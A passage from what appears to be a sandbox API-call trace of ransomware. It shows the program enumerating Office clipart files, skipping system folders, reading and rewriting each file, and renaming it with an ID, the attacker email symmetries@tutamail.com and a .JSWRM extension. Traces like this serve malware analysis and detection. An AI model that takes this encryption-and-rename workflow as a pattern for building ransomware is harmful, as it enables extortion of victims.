out: hHeap=0x1e0000) returned 1 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0092.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0092.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0092.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.374] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf66941e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf66941e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf66941e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02091_.WMF", cAlternateFileName="")) returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2=".") returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="..") returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="...") returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="windows") returned -1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="recovery") returned -1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="perflogs") returned -1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="documents and settings") returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="system volume information") returned -1 [0092.374] lstrcmpiW (lpString1="NA02091_.WMF", lpString2="msocache") returned 1 [0092.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02091_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02091_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02091_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02091_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02091_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02091_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.376] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1140) returned 1 [0092.376] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x230a00 [0092.376] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x470, lpOverlapped=0x0) returned 1 [0092.378] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.378] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x470, lpOverlapped=0x0) returned 1 [0092.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0092.378] CloseHandle (hObject=0x314) returned 1 [0092.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0092.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0092.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0092.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0092.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.380] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf66941e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf66941e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf66941e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02092_.WMF", cAlternateFileName="")) returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2=".") returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="..") returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="...") returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="windows") returned -1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="recovery") returned -1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="perflogs") returned -1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="documents and settings") returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="system volume information") returned -1 [0092.380] lstrcmpiW (lpString1="NA02092_.WMF", lpString2="msocache") returned 1 [0092.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02092_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02092_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02092_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02092_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02092_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02092_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.381] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1644) returned 1 [0092.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x660) returned 0x22d530 [0092.381] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x660, lpOverlapped=0x0) returned 1 [0092.382] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.382] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x660, lpOverlapped=0x0) returned 1 [0092.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0092.383] CloseHandle (hObject=0x314) returned 1 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0092.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.384] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf643165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf643165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf643165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02093_.WMF", cAlternateFileName="")) returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2=".") returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="..") returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="...") returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="windows") returned -1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="recovery") returned -1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="perflogs") returned -1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="documents and settings") returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="system volume information") returned -1 [0092.384] lstrcmpiW (lpString1="NA02093_.WMF", lpString2="msocache") returned 1 [0092.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02093_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02093_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02093_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02093_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02093_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02093_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.385] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=672) returned 1 [0092.385] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a0) returned 0x20b1f8 [0092.385] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2a0, lpOverlapped=0x0) returned 1 [0092.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.386] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2a0, lpOverlapped=0x0) returned 1 [0092.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0092.386] CloseHandle (hObject=0x314) returned 1 [0092.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0092.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0092.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0092.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0092.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.388] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fe8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02124_.WMF", cAlternateFileName="")) returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2=".") returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="..") returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="...") returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="windows") returned -1 [0092.388] lstrcmpiW 